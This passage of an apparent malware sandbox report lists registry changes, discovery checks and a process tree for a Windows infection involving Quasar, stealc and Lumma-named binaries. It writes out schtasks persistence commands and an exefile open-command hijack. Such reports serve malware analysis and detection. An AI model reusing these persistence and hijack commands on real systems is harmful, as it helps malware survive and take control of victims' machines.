| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\svchost.com | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\svchost.com | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\svchost.com | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\svchost.com | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\svchost.com | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\svchost.com | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\svchost.com | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\attrib.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Files\lummetc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\svchost.com | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\svchost.com | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\svchost.com | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Files\random.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\svchost.com | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\svchost.com | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\svchost.com | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\svchost.com | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\svchost.com | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\svchost.com | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\svchost.com | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\svchost.com | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\svchost.com | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\svchost.com | N/A |
System Network Configuration Discovery: Internet Connection Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\100006~1\STEALC~1.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\100006~1\STEALC~1.EXE | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Detects videocard installed
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Users\Admin\AppData\Local\Temp\Files\AA_v3.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | C:\Users\Admin\AppData\Local\Temp\Files\AA_v3.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Users\Admin\AppData\Local\Temp\Files\AA_v3.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE | C:\Users\Admin\AppData\Local\Temp\Files\AA_v3.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Ammyy | C:\Users\Admin\AppData\Local\Temp\Files\AA_v3.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Ammyy\Admin | C:\Users\Admin\AppData\Local\Temp\Files\AA_v3.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Users\Admin\AppData\Local\Temp\Files\AA_v3.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Ammyy\Admin | C:\Users\Admin\AppData\Local\Temp\Files\AA_v3.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Ammyy\Admin\hr3 = 4893cd9e8c781441d2a92a7b5f9b3a11bcd37e7e8b8558b059dd60b2da38f1eabdd7394eaa42eb3d1544382cfd1289e9db5f55de50061d9d0541e26e5bf6c9db8fb7162a0fcbb7c53daeac | C:\Users\Admin\AppData\Local\Temp\Files\AA_v3.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | C:\Users\Admin\AppData\Local\Temp\Files\AA_v3.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Users\Admin\AppData\Local\Temp\Files\AA_v3.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "C:\\Windows\\svchost.com \"%1\" %*" | C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\2946613613.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\SubDir\Client.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Files\AA_v3.exe | N/A |
| N/A | N/A | C:\Windows\System32\dwm.exe | N/A |
| N/A | N/A | C:\Windows\System32\dwm.exe | N/A |
| N/A | N/A | C:\Windows\System32\dwm.exe | N/A |
| N/A | N/A | C:\Windows\System32\dwm.exe | N/A |
| N/A | N/A | C:\Windows\System32\dwm.exe | N/A |
| N/A | N/A | C:\Windows\System32\dwm.exe | N/A |
| N/A | N/A | C:\Windows\System32\dwm.exe | N/A |
| N/A | N/A | C:\Windows\System32\dwm.exe | N/A |
| N/A | N/A | C:\Windows\System32\dwm.exe | N/A |
| N/A | N/A | C:\Windows\System32\dwm.exe | N/A |
| N/A | N/A | C:\Windows\System32\dwm.exe | N/A |
| N/A | N/A | C:\Windows\System32\dwm.exe | N/A |
| N/A | N/A | C:\Windows\System32\dwm.exe | N/A |
| N/A | N/A | C:\Windows\System32\dwm.exe | N/A |
| N/A | N/A | C:\Windows\System32\dwm.exe | N/A |
| N/A | N/A | C:\Windows\System32\dwm.exe | N/A |
| N/A | N/A | C:\Windows\System32\dwm.exe | N/A |
| N/A | N/A | C:\Windows\System32\dwm.exe | N/A |
| N/A | N/A | C:\Windows\System32\dwm.exe | N/A |
| N/A | N/A | C:\Windows\System32\dwm.exe | N/A |
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\SubDir\Client.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Files\AA_v3.exe | N/A |
| N/A | N/A | C:\Windows\System32\dwm.exe | N/A |
| N/A | N/A | C:\Windows\System32\dwm.exe | N/A |
| N/A | N/A | C:\Windows\System32\dwm.exe | N/A |
| N/A | N/A | C:\Windows\System32\dwm.exe | N/A |
| N/A | N/A | C:\Windows\System32\dwm.exe | N/A |
| N/A | N/A | C:\Windows\System32\dwm.exe | N/A |
| N/A | N/A | C:\Windows\System32\dwm.exe | N/A |
| N/A | N/A | C:\Windows\System32\dwm.exe | N/A |
| N/A | N/A | C:\Windows\System32\dwm.exe | N/A |
| N/A | N/A | C:\Windows\System32\dwm.exe | N/A |
| N/A | N/A | C:\Windows\System32\dwm.exe | N/A |
| N/A | N/A | C:\Windows\System32\dwm.exe | N/A |
| N/A | N/A | C:\Windows\System32\dwm.exe | N/A |
| N/A | N/A | C:\Windows\System32\dwm.exe | N/A |
| N/A | N/A | C:\Windows\System32\dwm.exe | N/A |
| N/A | N/A | C:\Windows\System32\dwm.exe | N/A |
| N/A | N/A | C:\Windows\System32\dwm.exe | N/A |
| N/A | N/A | C:\Windows\System32\dwm.exe | N/A |
| N/A | N/A | C:\Windows\System32\dwm.exe | N/A |
| N/A | N/A | C:\Windows\System32\dwm.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\SubDir\Client.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\SubDir\Client.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
Processes
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe
"C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe"
C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe
"C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe"
C:\Users\Admin\AppData\Local\Temp\3582-490\dxwebsetup.exe
"C:\Users\Admin\AppData\Local\Temp\3582-490\dxwebsetup.exe"
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\client.exe"
C:\Users\Admin\AppData\Local\Temp\Files\client.exe
C:\Users\Admin\AppData\Local\Temp\Files\client.exe
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
"C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\Client.exe"
C:\Users\Admin\AppData\Local\Temp\3582-490\Client.exe
C:\Users\Admin\AppData\Local\Temp\3582-490\Client.exe
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\plswork.exe"
C:\Users\Admin\AppData\Local\Temp\Files\plswork.exe
C:\Users\Admin\AppData\Local\Temp\Files\plswork.exe
C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
"C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\Client.exe"
C:\Users\Admin\AppData\Local\Temp\3582-490\Client.exe
C:\Users\Admin\AppData\Local\Temp\3582-490\Client.exe
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "java updater" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\Files\plswork.exe" /rl HIGHEST /f
C:\Windows\system32\SubDir\Client.exe
"C:\Windows\system32\SubDir\Client.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
"C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "java updater" /sc ONLOGON /tr "C:\Windows\system32\SubDir\Client.exe" /rl HIGHEST /f
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\winn.exe"
C:\Users\Admin\AppData\Local\Temp\Files\winn.exe
C:\Users\Admin\AppData\Local\Temp\Files\winn.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\CRYPTO~1.EXE"
C:\Users\Admin\AppData\Local\Temp\Files\CRYPTO~1.EXE
C:\Users\Admin\AppData\Local\Temp\Files\CRYPTO~1.EXE
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\soft.exe"
C:\Users\Admin\AppData\Local\Temp\Files\soft.exe
C:\Users\Admin\AppData\Local\Temp\Files\soft.exe
C:\Users\Admin\AppData\Local\Temp\Files\CRYPTO~1.EXE
C:\Users\Admin\AppData\Local\Temp\Files\CRYPTO~1.EXE
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\random.exe"
C:\Users\Admin\AppData\Local\Temp\Files\random.exe
C:\Users\Admin\AppData\Local\Temp\Files\random.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe"
C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe
C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\m.exe"
C:\Users\Admin\AppData\Local\Temp\Files\m.exe
C:\Users\Admin\AppData\Local\Temp\Files\m.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe"
C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe
C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe"
C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe
C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe
C:\Windows\sysnldcvmr.exe
C:\Windows\sysnldcvmr.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\TROJAN~1.EXE"
